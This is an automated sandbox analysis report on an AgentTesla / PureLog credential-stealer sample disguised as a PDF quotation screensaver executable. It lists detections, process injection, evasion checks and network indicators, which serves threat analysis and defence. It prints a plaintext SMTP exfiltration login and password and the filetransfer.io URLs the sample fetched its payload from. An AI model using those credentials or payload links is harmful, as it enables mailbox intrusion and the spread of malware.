Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_JULQTRA071244#U00faPDF.scr.exe

Overview

General Information

Sample name:QUOTATION_JULQTRA071244#U00faPDF.scr.exe
renamed because original name is a hash value
Original sample name:QUOTATION_JULQTRA071244PDF.scr.exe
Analysis ID:1467095
MD5:f0a33bc19a7edfa50259138ceae8c2ef
SHA1:23502ba3d4862040181f3484c7a07fd514b7e4d0
SHA256:49c758a7ea0cb8c7320183804f885757f60c5979be2e5fb9e6fa9db40498939b
Tags:exescr
Infos:

Detection

AgentTesla, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected PureLog Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: AspNetCompiler Execution
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTATION_JULQTRA071244#U00faPDF.scr.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe" MD5: F0A33BC19A7EDFA50259138CEAE8C2EF)
    • aspnet_compiler.exe (PID: 5584 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "minors@aoqiinflatables.com", "Password": "RaF5@@ts7^^!@San@<!!"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.1940288788.00000000080E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dace20.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.6dd4e40.10.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x31fe7:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x32059:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x320e3:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x32175:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x321df:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x32251:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x322e7:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x32377:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    Click to see the 19 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: AspNetCompiler Execution
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exe, ParentProcessId: 7612, ParentProcessName: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 5584, ProcessName: aspnet_compiler.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeAvira: detected
                    Found malware configuration
                    Source: 6.2.aspnet_compiler.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "gator3220.hostgator.com", "Username": "minors@aoqiinflatables.com", "Password": "RaF5@@ts7^^!@San@<!!"}
                    Multi AV Scanner detection for submitted file
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeReversingLabs: Detection: 52%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeJoe Sandbox ML: detected
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49707 version: TLS 1.2
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007027000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.00000000033A7000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.00000000070DF000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DB30AAh0_2_02DB2E80
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DBDAA5h0_2_02DBDA38
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DBDAA5h0_2_02DBDA28
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DB30AAh0_2_02DB2E70
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DB283Ch0_2_02DB27D8
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DB283Ch0_2_02DB27C9
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 4x nop then jmp 02DBDAA5h0_2_02DBDD20

                    Networking

                    barindex
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /data-package/btd2ptah/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /storage/download/FiMxpnoPTxVw HTTP/1.1Host: s21.filetransfer.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /data-package/btd2ptah/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                    Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /data-package/btd2ptah/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /storage/download/FiMxpnoPTxVw HTTP/1.1Host: s21.filetransfer.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /data-package/btd2ptah/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: filetransfer.io
                    Source: global trafficDNS traffic detected: DNS query: s21.filetransfer.io
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io/data-package/btd2ptah/download0C
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.iod
                    Source: aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003001000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2683739560.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000346B000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000007156000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000006.00000002.2681049301.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003088000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/btd2ptah/download
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003041000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.ioli
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000306F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s21.filetransfer.io
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000306F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.000000000306B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s21.filetransfer.io/storage/download/FiMxpnoPTxVw
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1917437133.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006EC4000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1940732437.0000000008150000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49707 version: TLS 1.2

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 6.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.QUOTATION_JULQTRA071244#U00faPDF.scr.exe.716b2c8.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_013749980_2_01374998
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_013722F20_2_013722F2
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_013764700_2_01376470
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_013764800_2_01376480
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_013749890_2_01374989
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DBB4F00_2_02DBB4F0
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB3C930_2_02DB3C93
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DBBDC00_2_02DBBDC0
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB457B0_2_02DB457B
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB22A60_2_02DB22A6
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DBDA380_2_02DBDA38
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DBDA280_2_02DBDA28
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB40CE0_2_02DB40CE
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB00400_2_02DB0040
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB486E0_2_02DB486E
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DBB1A80_2_02DBB1A8
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB41340_2_02DB4134
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB466D0_2_02DB466D
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DB34700_2_02DB3470
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DBDD200_2_02DBDD20
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DD4A400_2_02DD4A40
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DD3FC80_2_02DD3FC8
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DD4A300_2_02DD4A30
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DD89C00_2_02DD89C0
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DD3FB80_2_02DD3FB8
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DF00400_2_02DF0040
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DF12480_2_02DF1248
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DF03670_2_02DF0367
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_02DFEC480_2_02DFEC48
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A5D0200_2_08A5D020
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A5D8680_2_08A5D868
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A5CCD80_2_08A5CCD8
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A4000A0_2_08A4000A
                    Source: C:\Users\user\Desktop\QUOTATION_JULQTRA071244#U00faPDF.scr.exeCode function: 0_2_08A400400_2_08A40040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BBA5C86_2_02BBA5C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BB4AC86_2_02BB4AC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BB3EB06_2_02BB3EB0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BB9D406_2_02BB9D40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BB41F86_2_02BB41F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BBA5BA6_2_02BBA5BA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_02BBDC386_2_02BBDC38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_066120506_2_06612050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_066112A86_2_066112A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_066137F06_2_066137F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 6_2_066131086_2_06613108
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1927211181.00000000063A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1928437067.0000000006FA4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
                    Source: QUOTATION_JULQTRA071244#U00faPDF.scr.exe, 00000000.00000002.1935701482.0000000007B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWdfagb.dll" vs QUOTATION_JULQTRA071244#U00faPDF.scr.exe
